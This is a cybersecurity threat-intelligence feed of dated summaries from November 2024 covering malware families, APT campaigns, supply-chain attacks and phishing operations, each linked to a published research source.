Summary:: Researchers from Qualys have launched Advanced Hunting, a threat-hunting tool built into their Endpoint Detection and Response (EDR) platform. This capability helps security teams to proactively search for risks, uncover malicious behaviors, and identify potential breaches that may slip past traditional detection methods. Advanced Hunting uses the Qualys Query Language (QQL) to provide flexible operations such as field searches and string matching.

Source: https://blog.qualys.com/product-tech/2024/11/26/elevate-cyber-defense-with-qualys-advanced-hunting

Intel Source:: Krebsonsecurity

Intel Name:: Snowflake_Security_Exploited_by_Hackers

Date of Scan:: 2024-11-27

Impact:: LOW

Summary:: A massive cybercrime operation aimed against Snowflake customers has been discovered, indicating significant data theft and extortion. Two individuals have been caught, but the third, "Kiberphant0m," continues to sell stolen data online. Evidence suggests that this hacker, who may have been a US Army man stationed in South Korea, used poor account security to get access to important archives.

Source: https://krebsonsecurity.com/2024/11/hacker-in-snowflake-extortions-may-be-a-u-s-soldier/

Intel Source:: Checkpoint

Intel Name:: GodLoader_Targeting_Multiple_Operating_Systems

Date of Scan:: 2024-11-27

Impact:: LOW

Summary:: Researcher from Check Point have uncovered a malware called GodLoader that can infect multiple operating systems such as Windows, macOS, Linux, Android, and iOS. It leverages Godot Engine, a popular open-source game development platform to execute malicious activities. It is distributed through the Stargazers Ghost Network, a Malware-as-a-Service operation which is hosted on GitHub. The attackers use Godot's scripting language, GDScript to execute malicious commands and deliver malware. When GodLoader run, it decrypts and executes malicious GDScripts and downloads additional malicious payloads such as cryptocurrency miners like XMRig and credential-stealing malware like RedLine.

Source: https://research.checkpoint.com/2024/gaming-engines-an-undetected-playground-for-malware-loaders/

Intel Source:: Securelist

Intel Name:: The_Examination_of_Elpaco_Ransomware

Date of Scan:: 2024-11-26

Impact:: LOW

Summary:: Researchers at Securelist have examined a customized variant of the Mimic ransomware, identified as ElPaco. In a recent incident response case, it was found that the attackers gained access through Remote Desktop Protocol (RDP) via a brute-force attack and escalated their privileges by exploiting the CVE-2020-1472 (Zerologon) vulnerability. ElPaco uses the Everything library, which comes with a user-friendly graphical interface that allows attackers to tailor its functionality. The ransomware also includes features to disable security measures and run system commands.

Source: https://securelist.com/elpaco-ransomware-a-mimic-variant/114635/

Intel Source:: DETECT FYI

Intel Name:: EDRBypass_Detection_Update

Date of Scan:: 2024-11-26

Impact:: MEDIUM

Summary:: EDR Silencer, EDRSandblast, Killer Ultra, Kill AV, AVNeutralizer, EDR killer detection updates

Source: https://detect.fyi/detection-opportunities-edr-silencer-edrsandblast-kill-av-d882c290a393

Intel Source:: JPCERT

Intel Name:: APTC60_ThreatGroup

Date of Scan:: 2024-11-26

Impact:: LOW

Summary:: In August 2024, the APT-C-60 group launched targeted attacks against domestic organizations using spear-phishing emails that impersonated job applicants. These emails linked to a malicious Google Drive-hosted VHDX file, which contained malware designed to infect systems via legitimate tools and services, including git.exe, Bitbucket, and StatCounter. The malware leveraged sophisticated techniques such as COM hijacking and XOR encoding for persistence and stealth. It deployed backdoors, including SpyGrace v3.1.6, to exfiltrate data and execute commands.

Source: https://blogs.jpcert.or.jp/ja/2024/11/APT-C-60.html

Intel Source:: Seqrite

Intel Name:: Xworm_Malware

Date of Scan:: 2024-11-26

Impact:: LOW

Summary:: Xworm is a sneaky malware which is known for its design and obfuscation techniques to avoid detection. It communicates with its C2 server to execute their malicious activity. After compromising a machine, it creates a unique mutex to ensure only one copy of itself runs at a time. It sends detailed information about the infected computer back to attackers to monitor the system remotely and issue commands. Additionally, XWorm can change DNS settings, update itself and erase traces from the system.

Source: https://www.seqrite.com/blog/evolving-threats-the-adaptive-design-of-xworm-malware/

Intel Source:: Huntress

Intel Name:: Strengthening_Defenses_Against_C2_Tactics

Date of Scan:: 2024-11-26

Impact:: LOW

Summary:: Researchers at Huntress have discovered a novel yet traceable tradecraft used by a threat actor for remote access and command-and-control infrastructure. This shows the need of establishing continual feedback loops between detection and hunting cycles, with no opportunity for persistent threats or backdoors.

Source: https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access

Intel Source:: TRAC Labs

Intel Name:: SMOKEDHAM_Backdoor

Date of Scan:: 2024-11-26

Impact:: MEDIUM

Summary:: The SMOKEDHAM backdoor, operational since 2019, is deployed by the financially driven threat group UNC2465, known for advanced extortion campaigns, including ransomware such as DARKSIDE and LOCKBIT. Using trojanized software installers spread via malvertising on platforms like Google and Bing Ads, UNC2465 gains initial access to victims’ systems. SMOKEDHAM facilitates persistence and reconnaissance, employing tools like BloodHound and RDP, with malware often delivered through phishing emails or supply chain attacks. A notable 2021 supply chain attack targeted a CCTV vendor's clients, while recent 2023 campaigns used malicious versions of legitimate software. UNC2465 also exploits Cloudflare Workers for domain fronting and advanced persistence techniques such as DLL side-loading and registry modifications.

Source: https://medium.com/trac-labs/who-ordered-the-smokedham-backdoor-delicacies-in-the-wild-87f51e2e5bd2

Intel Source:: Aquasec

Intel Name:: Matrix_Launches_Large_Scale_DDoS_Campaign

Date of Scan:: 2024-11-26

Impact:: LOW

Summary:: Aquasec researchers have uncovered a DDOS campaign conducted by threat actor called Matrix. The attacker exploits weak credentials, misconfigurations, and vulnerabilities in internet-connected devices particularly IoT devices and enterprise servers to create a massive botnet capable of causing global disruptions. They target devices like routers, cameras, and telecom equipment as well as software systems like Hadoop and HugeGraph using brute-force attacks and public scripts to gain access. The campaign focuses heavily on cloud service providers (CSPs) and organizations in China and Japan.

Source: https://www.aquasec.com/blog/matrix-unleashes-a-new-widespread-ddos-campaign/

Intel Source:: Open Analysis Research

Intel Name:: AutoIt_Credential_Flusher

Date of Scan:: 2024-11-26

Impact:: LOW

Summary:: The Credential Flusher technique, observed since August 22, 2024, leverages AutoIt scripts to coerce victims into entering credentials into their browsers, which are later stolen using traditional stealer malware. This approach launches a browser in kiosk mode—locking it to a login page like Google—forcing victims to input credentials out of frustration. These credentials are stored in the browser’s credential store and subsequently exfiltrated by malware such as StealC. The Credential Flusher itself does not steal credentials but acts as a catalyst. It identifies available browsers, targets specific login pages, and is packaged into executable binaries for deployment.

Source: https://research.openanalysis.net/credflusher/kiosk/stealer/stealc/amadey/autoit/2024/09/11/cred-flusher.html

Intel Source:: Arcticwolf

Intel Name:: Exploitation_of_PAN_OS_Vulnerabilities

Date of Scan:: 2024-11-26

Impact:: LOW

Summary:: Researchers at Arctic Wolf have discovered several attacks targeting Palo Alto Networks firewall devices in a variety of businesses. Threat actors gained early access by exploiting two recently published PAN-OS vulnerabilities, CVE-2024-0012 and CVE-2024-9474. These attacks involved malicious HTTP downloads of the Sliver C2 framework, coinminer binaries, and other payloads.

Source: https://arcticwolf.com/resources/blog-uk/threat-campaign-targeting-palo-alto-networks-firewall-devices/

Intel Source:: ESET Research

Intel Name:: RomCom_Zero_Day_Exploitations

Date of Scan:: 2024-11-26

Impact:: MEDIUM

Summary:: ESET researchers uncovered a campaign by the Russia-aligned cybercrime and espionage group RomCom, exploiting two zero-day vulnerabilities in Mozilla products (CVE-2024-9680) and Windows (CVE-2024-49039). These critical flaws enabled attackers to execute code remotely and bypass Firefox’s sandbox protections, culminating in the delivery of the RomCom backdoor. The campaign utilized fake websites to redirect victims to exploit-hosting servers, deploying shellcode and privilege escalation techniques. Mozilla and Microsoft quickly patched the vulnerabilities in October and November 2024, respectively.

Source: https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/

Intel Source:: Trend Micro

Intel Name:: The_Return_of_ANEL_Backdoor

Date of Scan:: 2024-11-26

Impact:: LOW

Summary:: A new spear-phishing campaign, attributed to Earth Kasha, has been targeting individuals and organizations in Japan since June 2024. This campaign marks the return of the ANEL backdoor, previously used by APT10 until 2018, and the use of NOOPDOOR, associated with Earth Kasha. The campaign focuses on political organizations, research institutions, think tanks, and those involved in international relations, reflecting a shift in target from enterprises to individuals. Earth Kasha's tactics, techniques, and procedures (TTPs) have evolved, moving away from exploiting edge device vulnerabilities to spear-phishing, with a particular interest in Japan's national security and international relations.

Source: https://www.trendmicro.com/en_us/research/24/k/return-of-anel-in-the-recent-earth-kasha-spearphishing-campaign.html

Intel Source:: SOC Radar

Intel Name:: Perfctl_Malware_Targets_Linux_Servers

Date of Scan:: 2024-11-26

Impact:: LOW

Summary:: Perfctl is a sophisticated and stealthy malware targeting Linux servers, leveraging fileless infection techniques to evade traditional security defenses. It infiltrates systems by mimicking legitimate processes and using server resources for cryptocurrency mining and proxyjacking. The malware has primarily impacted industries like cryptocurrency platforms and software development, where high computational demand is common. Its ability to remain undetected while consuming valuable server resources makes it a significant threat, emphasizing the need for enhanced detection measures in Linux environments.

Source: https://socradar.io/perfctl-campaign-exploits-millions-of-linux-servers-for-crypto-mining-and-proxyjacking/

Intel Source:: LIA Insights

Intel Name:: VidarStealerUpdate

Date of Scan:: 2024-11-26

Impact:: LOW

Summary:: Threat actors managing botnets often use unique identifiers to organize bots, distinguish campaigns, and assign administrative access, particularly in Malware-as-a-Service (MaaS) operations. Identifiers vary across malware families; for instance, SmokeLoader uses plaintext strings, Bokbot employs binary identifiers, and Vidar stealer uses unique hexadecimal build IDs linked to threat actor profiles. Vidar build IDs, which hinder researchers from grouping samples without backend access, can still reveal campaign patterns when historical tasking data is available. Recent tracking highlighted increased activity and automation in October, with two Vidar tasks yielding 131 unique payloads identified as Lumma Stealer. These tasks, also used by other botnets like StealC, suggest automation to evade detection.

Source: https://insights.loaderinsight.agency/posts/vidar-build-id-correlation/

Intel Source:: Sentinelone

Intel Name:: CyberVolk_Evolving_Hacktivist_Threat

Date of Scan:: 2024-11-25

Impact:: LOW

Summary:: Researchers at SentinelLabs have discovered a pro-Russian hacktivist organization, CyberVolk, using ransomware attacks to take advantage of geopolitical tensions. They promote technologies like HexaLocker and Parano and exchange codebases with AzzaSec and DoubleFace.

Source: https://www.sentinelone.com/labs/cybervolk-a-deep-dive-into-the-hacktivists-tools-and-ransomware-fueling-pro-russian-cyber-attacks/

Intel Source:: Blackberry

Intel Name:: JinxLoader_to_Astolfo_Loader

Date of Scan:: 2024-11-25

Impact:: LOW

Summary:: Researchers at BlackBerry have uncovered a malware called JinxLoader which has been active since 2023. It operates as a MaaS and is distributes through phishing emails to target Windows and Linux systems. JinxLoader is primarily designed to deploy other malicious malware such as Formbook and XLoader and is managed through a centrally managed server panel. It oftens spread via password-protected RAR files and HTML-based phishing lures that use JavaScript to deliver the malware. Additionally, Astolfo Loader works similarly to Jinxloader which has been rewritten in C++ for better performance and smaller file size.

Source: https://blogs.blackberry.com/en/2024/11/jinxloader-evolution

Intel Source:: TheRavenFile

Intel Name:: New_Domains_of_INC_and_Lynx_Ransomware

Date of Scan:: 2024-11-25

Impact:: LOW

Summary:: The INC Ransomware group, known for attacks on companies like Yamaha Motors Philippines, Xerox, and various healthcare sectors, has been using multiple DLS (Data Leak Sites) on the surface web to leak victim data. In May 2024, they offered their ransomware project for sale and rebranded as Lynx Ransomware in July 2024. Despite the rebranding, the original INC Ransomware DLS, with over 100 victims, remains active, alongside the new Lynx Ransomware DLS, which has 40 victims. New domains related to both ransomware variants are still in operation.

Source: https://github.com/TheRavenFile/IOC/blob/main/INC-Lynx%20Ransomware

Intel Source:: Still / Azaka

Intel Name:: Obfuscated_Gh0st_Campaign_Targets_Chinese_Users

Date of Scan:: 2024-11-25

Impact:: LOW

Summary:: The Obfuscated Gh0st campaign targets Chinese-speaking individuals through fake downloads of browsers, VPNs, and Telegram. It collects fingerprinting information, including screen dimensions, language, and website titles upon page load. Clicking anywhere on the page triggers a malicious download, leading to the installation of the GoegIesretp malware, which is placed under C:\Windows\svcorenos once elevated to a service. The malware uses DSClock as a launcher and decodes obfuscated shellcode via checkUpdater.cfg and the RtlDecompressBuffer function.

Source: https://github.com/Still34/malware-lab/tree/main/reworkshop/2024-11-24

Intel Source:: Checkmarx

Intel Name:: NPM_Supply_Chain_Attack

Date of Scan:: 2024-11-25

Impact:: LOW

Summary:: Researchers from Checkmarx have discovered a supply chain attack replated to NPM Packages. The package steals sensitive information such as SSH keys and command history in every 12 hours while simultaneously mining cryptocurrency on infected systems. It sends stolen data to Dropbox and file.io. The package spread through two methods: direct installation from NPM and as a hidden dependency in a GitHub project named “yawpp” which pretends to be a WordPress tool. As of now, at least 68 systems have been compromised and actively mining cryptocurrency for the attackers.

Source: https://checkmarx.com/blog/npm-supply-chain-attack-combines-crypto-mining-and-data-theft/

Intel Source:: Trend Micro

Intel Name:: Earth_Estries_Cyber_Espionage_Campaign

Date of Scan:: 2024-11-25

Impact:: MEDIUM

Summary:: Trend Micro researchers have uncovered the cyber espionage campaign operated by Chinese advanced persistent threat (APT) group also known as Salt Typhoon, FamousSparrow targeting critical industries such as telecommunications, government entities, consulting firms, and NGOs since 2023. Their primary focus is on regions like the US, Asia-Pacific, Middle East, South Africa, and Southeast Asia. They use advanced techniques, exploiting server vulnerabilities like Ivanti VPN flaws, Fortinet SQL injection, and Microsoft Exchange's ProxyLogon to gain initial access. After gaining the access, they leverage legitimate tools for network traversal and deploy custom malware such as GHOSTSPIDER, SNAPPYBEE, and MASOL RAT to conduct long-term espionage on their targets.

Source: https://www.trendmicro.com/en_us/research/24/k/earth-estries.html

Intel Source:: CERT-AGID

Intel Name:: Banking_Entity_Targeting_Via_PEC_Mailboxes

Date of Scan:: 2024-11-25

Impact:: LOW

Summary:: CERT-AGID researchers have uncovered a phishing campaign targeting customers of the Intesa SanPaolo banking institution in Italy. In this campaign, the attackers send emails from compromised Certified Electronic Mail (PEC) accounts to look more legitimate. The emails warn users about an urgent need to update the device used for banking services to avoid losing access which include a link that redirects the user to fake banking login page. After entering their login credentials, victim further tricked into providing their payment card details to steal sensitive financial information.

Source: https://cert-agid.gov.it/news/caselle-pec-sempre-piu-usate-nel-phishing-per-le-frodi-bancarie/

Intel Source:: Cyble

Intel Name:: Ursnif_Banking_Trojan

Date of Scan:: 2024-11-25

Impact:: LOW

Summary:: Cyble researchers have discovered a phishing campaign targeting business professionals in the United States. The attacker uses a LNK file disguised as a PDF inside a ZIP archive that often delivered through spam emails to trick users. When the file is opened, it runs a command to executes malicious HTA file (HTML Application) that activates a malicious DLL file which identified as a banking trojan called Ursnif. This trojan connects to a remote server to download additional malware to steal sensitive information from the victim’s machine.

Source: https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/

Intel Source:: Cyfirma

Intel Name:: Hexon_Stealer

Date of Scan:: 2024-11-22

Impact:: LOW

Summary:: Cyfirma researchers have identified a malware called Hexon Stealer that specializes in stealing sensitive data, including browser credentials, autofill information, credit card details, cryptocurrency wallet details, and Discord tokens. The malware was initially shared on the Telegram channel Hexon Stealer but it is now being promoted under a new name Hexon Grabber. It grants attackers full remote access to compromised systems, enabling screen monitoring, keyboard and mouse control, and even private chats.

Source: https://www.cyfirma.com/research/hexon-stealer-the-long-journey-of-copying-hiding-and-rebranding/

Intel Source:: Knownsec 404 team (Medium)

Intel Name:: Unveiling_APT_K_47_ThreatActor

Date of Scan:: 2024-11-22

Impact:: MEDIUM

Summary:: Researchers at Knowsec have uncovered a campaign conducted by threat actor APT-K-47 also known as Mysterious Elephant which has been active since 2022 and is believed to originate from South Asia. The attacker uses a malicious CHM file disguised as content related to the religious event Hajj which silently executes a malicious executable named Policy_Formulation_Committee.exe. The final payload employs asynchronous programming which is similar to a known backdoor AsyncShell previously observed in APT-K-47’s campaigns. AsyncShell supports both cmd and PowerShell commands. APT-K-47 target South Asian countries including Pakistan, Bangladesh, and Turkey and focus on religion event and geopolitics issues.

Source: https://medium.com/@knownsec404team/unveiling-the-past-and-present-of-apt-k-47-weapon-asyncshell-5a98f75c2d68

Intel Source:: NSFOCUS

Intel Name:: XorBot_Botnet_Targets_IoT_Devices

Date of Scan:: 2024-11-22

Impact:: LOW

Summary:: XorBot, a new and evolving botnet family, emerged in November 2023 and has since become a significant security threat, particularly targeting Internet of Things (IoT) devices such as Intelbras cameras and routers from TP-Link and D-Link. First disclosed by NSFOCUS researchers in December 2023, XorBot exhibits advanced anti-tracking capabilities and has undergone continuous updates, with the latest version being 1.04. As the botnet grows, its operators are also offering DDoS attack rental services. The botnet is sometimes referred to as Masjesu after its newly registered channel name.

Source: https://nsfocusglobal.com/alert-xorbot-comes-back-with-enhanced-tactics/

Intel Source:: Linkedin

Intel Name:: SAFEPAY_Ransomware_Overview

Date of Scan:: 2024-11-22

Impact:: LOW

Summary:: SAFEPAY ransomware emerged in late November 2024, although it had been active since August 2024. It primarily targets Windows systems and has impacted 25 victims, including organizations in the United States, Argentina, Belgium, Canada, and the United Kingdom. Industries affected include service, energy, grocery, healthcare, hospitality, IT, and retail, with some victims previously attacked by Meow and Black Suit ransomware. SAFEPAY uses ShareFinder.ps1 to gather network situational awareness on Windows domains and has been observed operating under the hostnames WIN-3IUUOFVTQAR and WIN-SBOE3CPNALE. The ransomware's data leaks are hosted on an onion site, with the attackers utilizing VULTR services for DLS hosting on the TOR network. The group appears to be a rapidly organized entity, using a leaked Conti/LockBit encryptor and choosing basic vanity onion addresses.

Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_infosec-safepay-ransomware-activity-7265607811256987648-TIt3/

Intel Source:: Recorded Future

Intel Name:: TAG110_Cyber_Espionage_Campaign

Date of Scan:: 2024-11-22

Impact:: LOW

Summary:: Researchers from Insikt Group have discovered an ongoing cyber-espionage campaign targeting organizations in Central Asia, East Asia, and Europe. This campaign is being carried out by the Russia-aligned threat group TAG110, which overlaps with UAC0063 and is moderately confidently linked to the Russian APT group BlueDelta (APT28). This campaign, which has been active since at least July 2024, has affected 62 victims in eleven nations, with a primary focus on government, human rights, and educational institutions.

Source: https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-1121.pdf

Intel Source:: Sentilone

Intel Name:: DPRK_IT_Worker_Front_Companies_Exposed

Date of Scan:: 2024-11-22

Impact:: LOW

Summary:: Researches from SentinelLabs have observed the distinctive characteristics of various websites related to DPRK IT worker front organizations, which are currently taken by the US government. They concluded with high confidence that DPRK actors are impersonating US-based software and technology consultancy business by mimicking legal web firms in order to attain financial goals.

Source: https://www.sentinelone.com/labs/dprk-it-workers-a-network-of-active-front-companies-and-their-links-to-china/

Intel Source:: Phylum

Intel Name:: PyPI_Library_Targeting_Private_Keys

Date of Scan:: 2024-11-22

Impact:: LOW

Summary:: Researchers at Phylum have observed that the PyPI package aiocpa was upgraded with malicious code intended to steal private keys. When users initialize the crypto library, the code sends these keys to Telegram. Notably, the attacker avoided detection by keeping the package's GitHub repository free of malicious code.

Source: https://blog.phylum.io/python-crypto-library-updated-to-steal-private-keys/

Intel Source:: Reversing Labs

Intel Name:: Supply_Chain_Attack_on_Lottie_Player

Date of Scan:: 2024-11-22

Impact:: LOW

Summary:: Researchers from Reversing Labs have discovered a supply chain attack targeting the popular @lottiefiles/lottie-player package, showing the dangers of rogue packages infiltrating established codebases. This attack used hijacked maintainer accounts to publish malicious versions, potentially affecting many projects.

Source: https://www.reversinglabs.com/blog/differential-analysis-raises-red-flags-over-lottiefiles/lottie-player

Intel Source:: Hunt.IO

Intel Name:: New_Suspicious_Certificates_Linked_to_DarkPeony_C2

Date of Scan:: 2024-11-22

Impact:: LOW

Summary:: Hunt.IO researchers have identified two additional suspicious SSL/TLS certificates on infrastructure previously linked to suspected PlugX C2 nodes, with recurring use of AES in the organizational unit field. These certificates are associated with domains likely involved in malware communication or downloads. This aligns with previous findings from NTT, which connected the same infrastructure to the DarkPeony threat group. The group's ongoing use of similar certificates and servers suggests a consistent operational tempo, allowing for continuous tracking of their activity.

Source: https://hunt.io/blog/darkpeony-certificate-patterns

Intel Source:: Datadog

Intel Name:: NPM_and_PyPI_Malicious_Campaign

Date of Scan:: 2024-11-22

Impact:: MEDIUM

Summary:: Datadog researcher have identified a supply chain attack targeting two major software repositories such as PyPI and npm. This attack tracked as MUT-8694 which uses malicious packages to deliver infostealer malware to Windows users. The attackers leverage legitimate services like GitHub and Repl.it to host and distribute additional malicious payloads. The PyPI package executes a PowerShell command to download infostealer malware from GitHub which called Blank Grabber. Researchers also identified 42 malicious PyPI packages linked to this activity along with similar malicious npm packages such as nodelogic.

Source: https://securitylabs.datadoghq.com/articles/mut-8964-an-npm-and-pypi-malicious-campaign-targeting-windows-users/

Intel Source:: 360 Threat Intelligence Center

Intel Name:: APT_C_36_Targets_Colombia_with_DcRat

Date of Scan:: 2024-11-22

Impact:: MEDIUM

Summary:: APT-C-36, also known as Blind Eagle, is a suspected South American cyber threat group primarily targeting Colombia, with some activity in Ecuador and Panama. Since its discovery in 2018, the group has focused on attacking government entities, financial sectors, insurance companies, and large corporations in Colombia. Recently, Blind Eagle has used UUE-compressed packages disguised as judicial documents to deliver the DcRat backdoor, compromising victims systems.

Source: https://mp.weixin.qq.com/s/DDCCjhBjUTa7Ia4Hggsa1A

Intel Source:: Rapid7

Intel Name:: VenomRAT_vs_AsyncRAT

Date of Scan:: 2024-11-22

Impact:: LOW

Summary:: Rapid7 researchers have observed that VenomRAT and AsyncRAT are very popular tools among cybercriminals because they allow attackers to control over compromised machines for data theft, espionage, and continuous monitoring of victims. Both the RATs are open-source and are based on another tool called QuasarRAT which explains their similarities. However, they have added different features and behaviours over a time to make them stand out from each other. Threat actors such as groups like Blind Eagle(APT-C-36), Coral Rider, NullBulge, and OPERA1ER often use these RATs in their campaigns.

Source: https://www.rapid7.com/blog/post/2024/11/21/a-bag-of-rats-venomrat-vs-asyncrat/

Intel Source:: Cofense

Intel Name:: The_Dangerous_Blend_of_Phishing

Date of Scan:: 2024-11-21

Impact:: LOW

Summary:: Cofense researchers have observed that online scams and phishing websites are targeting users to steal their government ID details and facial data. These scams often start with phishing emails claiming that a user needs to verify their identity to avoid losing access to an account. The email creates urgency and tricks users into clicking a link. Once the user clicks on the link, they are redirected to a CAPTCHA verification page and after passing the CAPTCHA, the user is taken to another page that asks for personal information like passports or driving licenses. The final step involves a Selfie check where the user is asked to position their face in a circle and start a live recording.

Source: https://cofense.com/blog/the-dangerous-blend-of-phishing-for-government-ids-and-facial-recognition-video

Intel Source:: LevelBlue

Intel Name:: Persistence_Tactics_in_PUA_Threats

Date of Scan:: 2024-11-21

Impact:: LOW

Summary:: Researchers from LevelBlue have discovered a potentially unwanted application that used two persistence techniques Scheduled Task creation and Autorun registry keys to execute malicious JavaScript disguised as a PDF utility. At first identification, it was removed once it was confirmed to be illegal. In a similar situation, past analysis helped replace an exclusion with a blocklist entry, highlighting the importance of monitoring and analysis in minimizing such threats.

Source: https://levelblue.com/blogs/security-essentials/stories-from-the-soc-registry-clues-to-pdf-blues-a-tale-of-pua-persistence

Intel Source:: Malwarebytes

Intel Name:: Sad_Announcement_TechSupport_Scam

Date of Scan:: 2024-11-21

Impact:: LOW

Summary:: Researchers from Malwarebytes have discovered a new wave of tech support frauds that target emotional manipulation via "Sad announcement" emails. These emails frequently look to be from known contacts, with subject lines such as "Sad announcement: [Name]," and contain messages referencing shared memories or photographs to trick recipients into clicking malicious links.

Source: https://www.malwarebytes.com/blog/news/2024/11/sad-announcement-email-leads-to-tech-support-scam

Intel Source:: Netspoke

Intel Name:: NodeStealer_Targets_Facebook_Ads_Manager

Date of Scan:: 2024-11-21

Impact:: LOW

Summary:: Researchers at Netskope have identified a Python-based malware called NodeStealer. This is an infostealer that collects sensitive information such as credentials stored in web browsers, browser cookies, and now credit card details. Its primary focus is targeting Facebook business accounts particularly those using Facebook Ads Manager to extract financial details such as advertising budgets. NodeStealer employs advanced techniques like Windows Restart Manager to unlock browser files, inserting junk code to evade detection, and utilizing batch scripts to execute Python scripts on the infected machine.

Source: https://www.netskope.com/blog/python-nodestealer-targets-facebook-ads-manager-with-new-techniques

Intel Source:: Mcafee

Intel Name:: Rise_of_Lumma_Stealer_Threat

Date of Scan:: 2024-11-21

Impact:: LOW

Summary:: Researchers from McAfee have discovered an increase in the Lumma Stealer, an information-stealing malware that is spreading through Telegram channels. Threat actors exploit the platform's popularity to avoid typical detection techniques, delivering malware to a large, unknowing audience.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lumma-stealer-on-the-rise-how-telegram-channels-are-fueling-malware-proliferation/

Intel Source:: CISA

Intel Name:: BianLian_Ransomware_Updates

Date of Scan:: 2024-11-21

Impact:: MEDIUM

Summary:: A Joint advisory has issued by FBI, CISA, and ASD’s ACSC regarding the activities and tactics of the BianLian ransomware group. This group has been active since 2022 and using ransomware and data extortion techniques to target organizations worldwide. The group has impacted multiple critical infrastructure sectors such as professional services and property development firms in the U.S. and Australia. Initially, BianLian used a double extortion model but now shifted their focus to purely exfiltrating data and extorting victims without encrypting systems. The group gains access through stolen Remote Desktop Protocol (RDP) credentials and uses readily available tools and scripts for system discovery and credential harvesting. They exfiltrate stolen data via File Transfer Protocol (FTP), Rclone, and Mega file-sharing services. Victims are pressured into paying through threats of severe financial, legal, and reputational damage.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a

Intel Source:: EclecticIQ

Intel Name:: Threat_Actor_Targets_Telecom_and_Financial_Sectors

Date of Scan:: 2024-11-21

Impact:: MEDIUM

Summary:: Researchers from EclecticIQ have uncovered a phishing campaign targeting the telecommunications and financial sectors. The attackers are leveraging Google Docs to deliver phishing links which redirect victims to fake login pages hosted on Weebly, a legitimate website builder. The attackers create telecom-themed fake login pages for companies like AT&T and financial institution to target the users in the U.S. and Canada. Additionally, Attackers also use legitimate tracking tools like Sentry.io and Datadog in their phishing campaign to monitor the user activity. These tools collect details such as when a victim interacted with the phishing page, their IP address, and their location.

Source: https://blog.eclecticiq.com/financially-motivated-threat-actor-leveraged-google-docs-and-weebly-services-to-target-telecom-and-financial-sectors

Intel Source:: ESET

Intel Name:: Unveiling_WolfsBane

Date of Scan:: 2024-11-21

Impact:: MEDIUM

Summary:: ESET researchers have discovered two new Linux malware backdoors linked to the China-aligned Gelsemium APT group which has been active since 2014. These backdoors are named as WolfsBane and FireWood. WolfsBane is the Linux version of Gelsevirine, a known Windows backdoor used by Gelsemium. The second backdoor is FireWood that appears to be related to Project Wood, another malware used by Gelsemium. However, Firewood’s connection to the group is less certain. These tools are designed for cyberespionage that allow the attackers to steal sensitive data, maintain persistent access to compromised systems, and execute commands. Additionally, researchers identified other malicious tools such as webshells for remote control, an SSH password stealer, and a privilege escalation utility.

Source: https://www.welivesecurity.com/en/eset-research/unveiling-wolfsbane-gelsemiums-linux-counterpart-to-gelsevirine/

Intel Source:: Hunt.IO

Intel Name:: XenoRAT

Date of Scan:: 2024-11-21

Impact:: LOW

Summary:: Hunt.IO researchers have identified a new tactic of delivering a malware called XenoRAT. This is an open-source RAT which is known for targeting gamers. Cybercriminals often use fake software or phishing emails to deliver the malware but in this case they delivered it through an Excel XLL file called Payment_Details.xll. The file was created using a legitimate tool called Excel-DNA and protected with ConfuserEx, a popular obfuscation tool. The XLL file acted as a dropper, deploying XenoRAT and another remote access tool.

Source: https://hunt.io/blog/xenorat-excel-xll-confuserex-as-access-method

Intel Source:: Aquasec

Intel Name:: Exploitation_of_Misconfigured_Servers

Date of Scan:: 2024-11-20

Impact:: LOW

Summary:: Aquasec researchers have discovered new attack vector where attackers exploit misconfigured JupyterLab and Jupyter Notebook servers to hijack environments for streaming sports events. The attackers take advantages of these vulnerable server to gain the control. After gaining the access, they install the ffmpeg tool to capture and redirect live sports broadcasts to their own illegal servers. Additionally, the attacker could disrupt data operations, stealing information, or accessing other critical systems.

Source: https://www.aquasec.com/blog/threat-actors-hijack-misconfigured-servers-for-live-sports-streaming/

Intel Source:: STR

Intel Name:: Potential_C2_Seeder_Queries_11192024

Date of Scan:: 2024-11-20

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: https://github.com/str-int-repo/str-seeder-behavior-queries

Intel Source:: NTT

Intel Name:: DarkPlum_Targeting_Japan_Through_AsyncRAT

Date of Scan:: 2024-11-20

Impact:: MEDIUM

Summary:: NTT Researchers have uncovered threat group called DarkPlum also known as Kimsuky or APT43 has been targeting Japan since March 2024 and using a customized variant of AsyncRAT which is available on GitHub. AsyncRAT is capable of infecting devices, gather information, and execute malicious plugins sent from a command-and-control (C&C) server. The attacker uses several plugins such as RemoteDesktop, FileManager, and RemoteShell in its AsyncRAT variants. The RemoteDesktop plugin enables screen capture, mouse control, and keyboard input. The FileManager plugin steals folder and drive information, manipulates files, and even downloads tools like 7zip. The RemoteShell plugin allows DarkPlum to open command prompts, execute commands, and terminate processes to explore and manipulate the victim's environment.

Source: https://polite-sea-077fba000.1.azurestaticapps.net/tech_blog/darkplum-asyncrat

Intel Source:: Trellix

Intel Name:: When_Guardians_Become_Predators

Date of Scan:: 2024-11-20

Impact:: LOW

Summary:: A recent discovery by Trellix’s Advanced Research Center reveals a concerning malware campaign that weaponizes a legitimate Avast Anti-Rootkit driver to bypass security measures and gain control over infected systems. The malware, using the trusted kernel-mode driver "aswArPot.sys," drops it onto the system and installs it as a service, allowing it to access critical system processes. This high-level access enables the malware to terminate antivirus and endpoint detection processes, undermining the system’s defenses. By leveraging the Avast driver to terminate security software, the malware evades detection and escalates its control.

Source: https://www.trellix.com/blogs/research/when-guardians-become-predators-how-malware-corrupts-the-protectors/

Intel Source:: SCI Labs

Intel Name:: New_Silver_Shifting_Yak_Banking_Trojan

Date of Scan:: 2024-11-20

Impact:: LOW

Summary:: SCILabs researchers have identified a new banking trojan named Silver Shifting Yak and provided the tactics, techniques, and procedures (TTPs). The Trojan primarily targets financial institutions and Microsoft services in Latin America, stealing sensitive data such as login credentials. Notably, it employs dynamic URL alterations for its command-and-control (C2) server and uses varied domain names to evade detection. While the exact distribution method remains unclear, it is likely spread via malicious email attachments disguised as invoices or documents, similar to other regional threats.

Source: https://blog.scilabs.mx/en/new-silver-shifting-yak-banking-trojan/

Intel Source:: CERT-AGID

Intel Name:: GitHub_Hosted_Phishing_Campaign

